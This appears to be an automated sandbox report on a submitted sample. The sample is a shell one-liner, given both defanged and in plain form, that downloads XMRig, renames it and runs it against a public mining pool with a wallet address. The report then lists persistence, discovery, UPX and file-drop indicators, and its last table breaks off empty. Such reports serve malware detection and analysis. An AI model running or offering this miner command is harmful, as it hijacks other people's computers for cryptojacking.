hxxp://wget hxxps://github[.]com/xmrig/xmrig/releases/download/v6[.]21[.]3/xmrig-6[.]21[.]3-linux-static-x64[.]tar[.]gz && tar -xz -f xmrig-6[.]21[.]3-linux-static-x64[.]tar[.]gz && cd xmrig-6[.]21[.]3 && mv xmrig cool && [.]/cool -o xmrpool[.]eu[:]3333 -u 4BCzRFseZPce3GUMsqGEHjeSgzzBhE3C72JdGdapz3kgdWpq4ri7NbNfTKCotSdAP2a6c6f4Qq3XHWRMJX1EYJnrDrSeJG3

Analysis

max time kernel
1199s
max time network
1202s
platform
windows11-21h2_x64
resource
win11-20240709-en
resource tags

arch:x64arch:x86image:win11-20240709-enlocale:en-usos:windows11-21h2-x64system
submitted
21/07/2024, 17:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://wget https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-linux-static-x64.tar.gz && tar -xz -f xmrig-6.21.3-linux-static-x64.tar.gz && cd xmrig-6.21.3 && mv xmrig cool && ./cool -o xmrpool.eu:3333 -u 4BCzRFseZPce3GUMsqGEHjeSgzzBhE3C72JdGdapz3kgdWpq4ri7NbNfTKCotSdAP2a6c6f4Qq3XHWRMJX1EYJnrDrSeJG3

Score

8^/10

discovery evasion persistence privilege_escalation spyware stealer trojan upx

Malware Config

Signatures

Boot or Logon Autostart Execution: Active Setup 2 TTPs 7 IoCs

Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

persistence

Active Setup

T1547.014

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components	setup.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\ = "Google Chrome"	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\StubPath = "\"C:\\Program Files\\Google\\Chrome\\Application\\126.0.6478.128\\Installer\\chrmstp.exe\" --configure-user-settings --verbose-logging --system-level --channel=stable"	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\Localized Name = "Google Chrome"	setup.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\IsInstalled = "1"	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\Version = "43,0,0,0"	setup.exe

Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
persistence privilege_escalation

Component Object Model Hijacking
T1546.015

Executes dropped EXE 64 IoCs

pid	Process
4440	ChromeSetup.exe
4952	updater.exe
5068	updater.exe
5116	updater.exe
2404	updater.exe
1988	updater.exe
1800	updater.exe
2328	126.0.6478.128_chrome_installer.exe
5092	setup.exe
2072	setup.exe
2524	setup.exe
3420	setup.exe
684	setup.exe
580	setup.exe
3052	setup.exe
3324	setup.exe
1468	chrome.exe
4956	chrome.exe
1644	chrome.exe
3084	chrome.exe
3564	chrome.exe
3508	chrome.exe
1484	chrome.exe
3340	elevation_service.exe
3976	chrome.exe
2040	chrome.exe
856	chrome.exe
4440	chrome.exe
784	chrome.exe
3712	chrome.exe
5076	chrome.exe
1204	chrome.exe
2092	getscreen.exe
5084	getscreen.exe
220	dzjqtuxwimtiosjogvbxhxcjqukpbuu-elevate.exe
1972	getscreen.exe
4324	getscreen.exe
616	getscreen.exe
1536	getscreen.exe
3092	getscreen.exe
5232	getscreen.exe
5288	chrome.exe
5380	chrome.exe
5540	chrome.exe
5624	chrome.exe
5632	chrome.exe
5136	chrome.exe
4388	chrome.exe
5920	chrome.exe
5180	chrome.exe
4584	chrome.exe
5536	chrome.exe
6040	chrome.exe
5136	chrome.exe
5316	chrome.exe
2692	getscreen.exe
6120	getscreen.exe
5984	getscreen.exe
4624	chrome.exe
988	chrome.exe
4548	chrome.exe
5152	chrome.exe
5168	chrome.exe
3460	chrome.exe

Loads dropped DLL 64 IoCs

pid	Process
1468	chrome.exe
4956	chrome.exe
1468	chrome.exe
1644	chrome.exe
3084	chrome.exe
1644	chrome.exe
3084	chrome.exe
1644	chrome.exe
1644	chrome.exe
1644	chrome.exe
3564	chrome.exe
3564	chrome.exe
3508	chrome.exe
1484	chrome.exe
1484	chrome.exe
1644	chrome.exe
1644	chrome.exe
1644	chrome.exe
3508	chrome.exe
3976	chrome.exe
3976	chrome.exe
2040	chrome.exe
2040	chrome.exe
856	chrome.exe
856	chrome.exe
4440	chrome.exe
4440	chrome.exe
3712	chrome.exe
784	chrome.exe
784	chrome.exe
3712	chrome.exe
5076	chrome.exe
5076	chrome.exe
1204	chrome.exe
1204	chrome.exe
5288	chrome.exe
5288	chrome.exe
5380	chrome.exe
5380	chrome.exe
5540	chrome.exe
5540	chrome.exe
5624	chrome.exe
5632	chrome.exe
5624	chrome.exe
5632	chrome.exe
5136	chrome.exe
5136	chrome.exe
4388	chrome.exe
4388	chrome.exe
5920	chrome.exe
5920	chrome.exe
5920	chrome.exe
5920	chrome.exe
5920	chrome.exe
5180	chrome.exe
5180	chrome.exe
4584	chrome.exe
4584	chrome.exe
5536	chrome.exe
5536	chrome.exe
6040	chrome.exe
6040	chrome.exe
5136	chrome.exe
5136	chrome.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/2092-1076-0x00007FF6526B0000-0x00007FF653FBE000-memory.dmp	upx
behavioral1/memory/5084-1088-0x00007FF6526B0000-0x00007FF653FBE000-memory.dmp	upx
behavioral1/files/0x000300000002a5ec-1095.dat	upx
behavioral1/memory/220-1098-0x00007FF669270000-0x00007FF66AB7E000-memory.dmp	upx
behavioral1/memory/220-1097-0x00007FF669270000-0x00007FF66AB7E000-memory.dmp	upx
behavioral1/memory/1972-1110-0x00007FF6526B0000-0x00007FF653FBE000-memory.dmp	upx
behavioral1/memory/1972-1108-0x00007FF6526B0000-0x00007FF653FBE000-memory.dmp	upx
behavioral1/memory/4324-1120-0x00007FF6526B0000-0x00007FF653FBE000-memory.dmp	upx
behavioral1/memory/5084-1125-0x00007FF6526B0000-0x00007FF653FBE000-memory.dmp	upx
behavioral1/memory/1536-1140-0x00007FF757B60000-0x00007FF75946E000-memory.dmp	upx
behavioral1/memory/2092-1147-0x00007FF6526B0000-0x00007FF653FBE000-memory.dmp	upx
behavioral1/memory/2092-1157-0x00007FF6526B0000-0x00007FF653FBE000-memory.dmp	upx
behavioral1/memory/5232-1160-0x00007FF757B60000-0x00007FF75946E000-memory.dmp	upx
behavioral1/memory/616-1161-0x00007FF757B60000-0x00007FF75946E000-memory.dmp	upx
behavioral1/memory/3092-1162-0x00007FF757B60000-0x00007FF75946E000-memory.dmp	upx
behavioral1/memory/616-1172-0x00007FF757B60000-0x00007FF75946E000-memory.dmp	upx
behavioral1/memory/3092-1196-0x00007FF757B60000-0x00007FF75946E000-memory.dmp	upx
behavioral1/memory/616-1223-0x00007FF757B60000-0x00007FF75946E000-memory.dmp	upx
behavioral1/memory/3092-1224-0x00007FF757B60000-0x00007FF75946E000-memory.dmp	upx
behavioral1/memory/616-1282-0x00007FF757B60000-0x00007FF75946E000-memory.dmp	upx
behavioral1/memory/3092-1283-0x00007FF757B60000-0x00007FF75946E000-memory.dmp	upx
behavioral1/memory/616-1311-0x00007FF757B60000-0x00007FF75946E000-memory.dmp	upx
behavioral1/memory/3092-1312-0x00007FF757B60000-0x00007FF75946E000-memory.dmp	upx
behavioral1/memory/616-1363-0x00007FF757B60000-0x00007FF75946E000-memory.dmp	upx
behavioral1/memory/3092-1364-0x00007FF757B60000-0x00007FF75946E000-memory.dmp	upx
behavioral1/memory/616-1377-0x00007FF757B60000-0x00007FF75946E000-memory.dmp	upx
behavioral1/memory/3092-1379-0x00007FF757B60000-0x00007FF75946E000-memory.dmp	upx
behavioral1/memory/616-1398-0x00007FF757B60000-0x00007FF75946E000-memory.dmp	upx
behavioral1/memory/3092-1403-0x00007FF757B60000-0x00007FF75946E000-memory.dmp	upx
behavioral1/memory/616-1579-0x00007FF757B60000-0x00007FF75946E000-memory.dmp	upx
behavioral1/memory/3092-1580-0x00007FF757B60000-0x00007FF75946E000-memory.dmp	upx
behavioral1/memory/616-1632-0x00007FF757B60000-0x00007FF75946E000-memory.dmp	upx
behavioral1/memory/3092-1672-0x00007FF757B60000-0x00007FF75946E000-memory.dmp	upx
behavioral1/memory/616-1791-0x00007FF757B60000-0x00007FF75946E000-memory.dmp	upx
behavioral1/memory/3092-1792-0x00007FF757B60000-0x00007FF75946E000-memory.dmp	upx
behavioral1/memory/616-1830-0x00007FF757B60000-0x00007FF75946E000-memory.dmp	upx
behavioral1/memory/3092-1831-0x00007FF757B60000-0x00007FF75946E000-memory.dmp	upx
behavioral1/memory/2692-1854-0x00007FF757B60000-0x00007FF75946E000-memory.dmp	upx
behavioral1/memory/3092-1861-0x00007FF757B60000-0x00007FF75946E000-memory.dmp	upx
behavioral1/memory/616-1860-0x00007FF757B60000-0x00007FF75946E000-memory.dmp	upx
behavioral1/memory/6120-1864-0x00007FF757B60000-0x00007FF75946E000-memory.dmp	upx
behavioral1/memory/616-1891-0x00007FF757B60000-0x00007FF75946E000-memory.dmp	upx
behavioral1/memory/3092-1892-0x00007FF757B60000-0x00007FF75946E000-memory.dmp	upx
behavioral1/memory/5984-1893-0x00007FF757B60000-0x00007FF75946E000-memory.dmp	upx
behavioral1/memory/616-1946-0x00007FF757B60000-0x00007FF75946E000-memory.dmp	upx
behavioral1/memory/3092-1947-0x00007FF757B60000-0x00007FF75946E000-memory.dmp	upx
behavioral1/memory/5984-1960-0x00007FF757B60000-0x00007FF75946E000-memory.dmp	upx
behavioral1/memory/616-1979-0x00007FF757B60000-0x00007FF75946E000-memory.dmp	upx
behavioral1/memory/3092-1980-0x00007FF757B60000-0x00007FF75946E000-memory.dmp	upx
behavioral1/memory/5984-1998-0x00007FF757B60000-0x00007FF75946E000-memory.dmp	upx
behavioral1/memory/616-2078-0x00007FF757B60000-0x00007FF75946E000-memory.dmp	upx
behavioral1/memory/3092-2079-0x00007FF757B60000-0x00007FF75946E000-memory.dmp	upx
behavioral1/memory/5984-3701-0x00007FF757B60000-0x00007FF75946E000-memory.dmp	upx
behavioral1/memory/616-3978-0x00007FF757B60000-0x00007FF75946E000-memory.dmp	upx
behavioral1/memory/3092-3995-0x00007FF757B60000-0x00007FF75946E000-memory.dmp	upx
behavioral1/memory/5984-4013-0x00007FF757B60000-0x00007FF75946E000-memory.dmp	upx
behavioral1/memory/616-4041-0x00007FF757B60000-0x00007FF75946E000-memory.dmp	upx
behavioral1/memory/5984-4046-0x00007FF757B60000-0x00007FF75946E000-memory.dmp	upx
behavioral1/memory/3092-4051-0x00007FF757B60000-0x00007FF75946E000-memory.dmp	upx
behavioral1/memory/616-4071-0x00007FF757B60000-0x00007FF75946E000-memory.dmp	upx
behavioral1/memory/3092-4081-0x00007FF757B60000-0x00007FF75946E000-memory.dmp	upx
behavioral1/memory/616-4090-0x00007FF757B60000-0x00007FF75946E000-memory.dmp	upx
behavioral1/memory/3092-4093-0x00007FF757B60000-0x00007FF75946E000-memory.dmp	upx
behavioral1/memory/616-4094-0x00007FF757B60000-0x00007FF75946E000-memory.dmp	upx

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 6 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	updater.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	updater.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	updater.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	updater.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	updater.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	updater.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
256	drive.google.com
254	drive.google.com

Checks system information in the registry 2 TTPs 2 IoCs

System information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	chrome.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk	setup.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Google\GoogleUpdater\updater.log.old	updater.exe
File opened for modification	C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\Crashpad\settings.dat	updater.exe
File opened for modification	C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\Crashpad\metadata	updater.exe
File created	C:\Program Files (x86)\Google\GoogleUpdater\94531944-d17b-450c-b90f-1ffa43587473.tmp	updater.exe
File opened for modification	C:\Program Files\Getscreen.me\logs\20240721.log	getscreen.exe
File opened for modification	C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\Crashpad\metadata	updater.exe
File opened for modification	C:\Program Files\Getscreen.me\logs\20240721.log	getscreen.exe
File created	C:\Program Files (x86)\Google\GoogleUpdater\00c9ebd8-791b-4bae-a16a-66a5beaa591b.tmp	updater.exe
File created	C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe	updater.exe
File created	C:\Program Files (x86)\Google\GoogleUpdater\prefs.json~RFe589dd1.TMP	updater.exe
File created	C:\Program Files (x86)\Google\GoogleUpdater\c0966c0c-1c25-4329-9654-0af393ca9224.tmp	updater.exe
File created	C:\Program Files\Google\Chrome\Temp\source5092_2141456845\Chrome-bin\126.0.6478.128\Locales\en-US.pak	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source5092_2141456845\Chrome-bin\126.0.6478.128\VisualElements\SmallLogo.png	setup.exe
File opened for modification	C:\Program Files\Getscreen.me\logs\20240721.log	getscreen.exe
File created	C:\Program Files (x86)\Google\GoogleUpdater\prefs.json~RFe5d57c7.TMP	updater.exe
File opened for modification	C:\Program Files (x86)\Google\GoogleUpdater\updater.log	updater.exe
File created	C:\Program Files\Google\Chrome\Temp\source5092_2141456845\Chrome-bin\126.0.6478.128\dxil.dll	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source5092_2141456845\Chrome-bin\126.0.6478.128\icudtl.dat	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source5092_2141456845\Chrome-bin\126.0.6478.128\Locales\nl.pak	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source5092_2141456845\Chrome-bin\126.0.6478.128\Locales\zh-TW.pak	setup.exe
File opened for modification	C:\Program Files (x86)\Google\GoogleUpdater\updater.log	updater.exe
File created	C:\Program Files (x86)\Google\Update\GoogleUpdate.exe	updater.exe
File created	C:\Program Files (x86)\Google\GoogleUpdater\prefs.json~RFe5dc2c6.TMP	updater.exe
File created	C:\Program Files (x86)\Google\GoogleUpdater\4e69e09d-8f78-4eda-9672-7ab2f8e89c25.tmp	updater.exe
File created	C:\Program Files\Google\Chrome\Temp\source5092_2141456845\Chrome-bin\126.0.6478.128\Locales\ml.pak	setup.exe
File opened for modification	C:\Program Files (x86)\Google\GoogleUpdater\updater.log	updater.exe
File created	C:\Program Files\Google\Chrome\Temp\source5092_2141456845\Chrome-bin\126.0.6478.128\chrome_elf.dll	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source5092_2141456845\Chrome-bin\126.0.6478.128\libEGL.dll	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source5092_2141456845\Chrome-bin\126.0.6478.128\mojo_core.dll	setup.exe
File opened for modification	C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\Crashpad\metadata	updater.exe
File opened for modification	C:\Program Files (x86)\Google\GoogleUpdater\prefs.json	updater.exe
File created	C:\Program Files\Google\Chrome\Temp\source5092_2141456845\Chrome-bin\126.0.6478.128\126.0.6478.128.manifest	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source5092_2141456845\Chrome-bin\126.0.6478.128\MEIPreload\manifest.json	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source5092_2141456845\Chrome-bin\126.0.6478.128\VisualElements\LogoBeta.png	setup.exe
File opened for modification	C:\Program Files (x86)\Google\GoogleUpdater\updater.log	updater.exe
File created	C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\90736bd5-b6eb-481f-a75f-33fdd9aa83e7.tmp	updater.exe
File opened for modification	C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\prefs.json	updater.exe
File created	C:\Program Files\Google\Chrome\Temp\source5092_2141456845\Chrome-bin\126.0.6478.128\Extensions\external_extensions.json	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source5092_2141456845\Chrome-bin\126.0.6478.128\Locales\lv.pak	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source5092_2141456845\Chrome-bin\126.0.6478.128\eventlog_provider.dll	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source5092_2141456845\Chrome-bin\126.0.6478.128\MEIPreload\preloaded_data.pb	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source5092_2141456845\Chrome-bin\126.0.6478.128\resources.pak	setup.exe
File opened for modification	C:\Program Files\Getscreen.me\logs\20240721.log	getscreen.exe
File opened for modification	C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\Crashpad\metadata	updater.exe
File opened for modification	C:\Program Files (x86)\Google\GoogleUpdater\prefs.json	updater.exe
File created	C:\Program Files\Google\Chrome\Temp\source5092_2141456845\Chrome-bin\126.0.6478.128\Locales\hi.pak	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source5092_2141456845\Chrome-bin\126.0.6478.128\Locales\hr.pak	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source5092_2141456845\Chrome-bin\126.0.6478.128\Locales\vi.pak	setup.exe
File opened for modification	C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\Crashpad\metadata	updater.exe
File opened for modification	C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\Crashpad\settings.dat	updater.exe
File created	C:\Program Files (x86)\Google\GoogleUpdater\prefs.json~RFe5de9d6.TMP	updater.exe
File opened for modification	C:\Program Files (x86)\Google\GoogleUpdater\updater.log	ChromeSetup.exe
File opened for modification	C:\Program Files\Getscreen.me\getscreen.exe	getscreen.exe
File opened for modification	C:\Program Files\Getscreen.me\logs\20240721.log	getscreen.exe
File opened for modification	C:\Program Files\Getscreen.me\logs\20240721.log	getscreen.exe
File opened for modification	C:\Program Files (x86)\Google\GoogleUpdater\updater.log	updater.exe
File created	C:\Program Files\Google\Chrome\Temp\source5092_2141456845\Chrome-bin\126.0.6478.128\Locales\pt-PT.pak	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source5092_2141456845\Chrome-bin\126.0.6478.128\Locales\ru.pak	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source5092_2141456845\Chrome-bin\126.0.6478.128\Locales\ta.pak	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source5092_2141456845\Chrome-bin\126.0.6478.128\Locales\th.pak	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source5092_2141456845\Chrome-bin\126.0.6478.128\VisualElements\Logo.png	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source5092_2141456845\Chrome-bin\126.0.6478.128\elevation_service.exe	setup.exe
File opened for modification	C:\Program Files\Getscreen.me\logs\20240721.log	getscreen.exe
File opened for modification	C:\Program Files (x86)\Google\GoogleUpdater\updater.log.old	updater.exe

Drops file in Windows directory 41 IoCs

description	ioc	Process
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1988_1228947821\CR_7AFDA.tmp\CHROME.PACKED.7Z	126.0.6478.128_chrome_installer.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1988_1228947821\CR_7AFDA.tmp\SETUP.EX_	126.0.6478.128_chrome_installer.exe
File opened for modification	C:\Windows\SystemTemp\Crashpad\metadata	setup.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1468_459113383\LICENSE	chrome.exe
File created	C:\Windows\SystemTemp\chrome_url_fetcher_1988_2006851124\-8a69d345-d564-463c-aff1-a69d9e530f96-_126.0.6478.128_all_ac3677u5ueqzpoxisjporjdy6inq.crx3	updater.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1988_1228947821\manifest.json	updater.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1988_1228947821\af0bb67c-3ccc-4f0a-a034-1e1f9ac45326.tmp	updater.exe
File opened for modification	C:\Windows\SystemTemp\Crashpad\metadata	setup.exe
File opened for modification	C:\Windows\SystemTemp\Crashpad\settings.dat	setup.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1468_459113383\manifest.fingerprint	chrome.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1468_586697695\manifest.json	chrome.exe
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1988_1228947821\manifest.fingerprint	updater.exe
File opened for modification	C:\Windows\SystemTemp	setup.exe
File opened for modification	C:\Windows\SystemTemp\Crashpad\metadata	setup.exe
File opened for modification	C:\Windows\SystemTemp	ChromeSetup.exe
File created	C:\Windows\SystemTemp\Google4440_118297452\bin\uninstall.cmd	ChromeSetup.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1988_1228947821\_metadata\verified_contents.json	updater.exe
File opened for modification	C:\Windows\SystemTemp	setup.exe
File opened for modification	C:\Windows\SystemTemp\Crashpad\settings.dat	setup.exe
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1988_1228947821\CR_7AFDA.tmp\setup.exe	126.0.6478.128_chrome_installer.exe
File opened for modification	C:\Windows\SystemTemp\Crashpad\settings.dat	setup.exe
File opened for modification	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1988_1228947821\CR_7AFDA.tmp\setup.exe	126.0.6478.128_chrome_installer.exe
File opened for modification	C:\Windows\SystemTemp\Crashpad\settings.dat	setup.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1468_459113383\manifest.json	chrome.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1468_459113383\_metadata\verified_contents.json	chrome.exe
File created	C:\Windows\SystemTemp\Google4440_118297452\updater.7z	ChromeSetup.exe
File created	C:\Windows\SystemTemp\Google4440_118297452\bin\updater.exe	ChromeSetup.exe
File opened for modification	C:\Windows\SystemTemp	updater.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1468_586697695\Filtering Rules	chrome.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1988_1228947821\126.0.6478.128_chrome_installer.exe	updater.exe
File opened for modification	C:\Windows\SystemTemp	setup.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1468_586697695\LICENSE.txt	chrome.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1468_586697695\_metadata\verified_contents.json	chrome.exe
File created	C:\Windows\SystemTemp\Google4440_1276715710\UPDATER.PACKED.7Z	ChromeSetup.exe
File opened for modification	C:\Windows\SystemTemp\Crashpad\metadata	setup.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1468_459113383\crl-set	chrome.exe
File opened for modification	C:\Windows\SystemTemp	updater.exe
File opened for modification	C:\Windows\SystemTemp	setup.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1468_586697695\manifest.fingerprint	chrome.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 11 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Modifies Internet Explorer settings 1 TTPs 7 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main	getscreen.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl	getscreen.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	getscreen.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\getscreen.exe = "11001"	getscreen.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\getscreen.exe = "11001"	getscreen.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\getscreen.exe = "11001"	getscreen.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	getscreen.exe

Modifies data under HKEY_USERS 18 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Google\Chrome\InstallerPinned = "0"	setup.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\GetScreen\Getscreen.me\ProxyPort = "0"	getscreen.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Google	setup.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	getscreen.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Google\Chrome	setup.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	setup.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\GetScreen\Getscreen.me	getscreen.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\GetScreen\Getscreen.me\ProxyEnable = "0"	getscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\GetScreen\Getscreen.me\ProxyLogin	getscreen.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133660558239104177"	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\GetScreen	getscreen.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\GetScreen\Getscreen.me	getscreen.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\GetScreen\Getscreen.me\ProxyType = "0"	getscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\GetScreen\Getscreen.me\ProxyServer	getscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\GetScreen\Getscreen.me\ProxyPassword	getscreen.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE	getscreen.exe

Modifies registry class 64 IoCs

description	ioc	Process
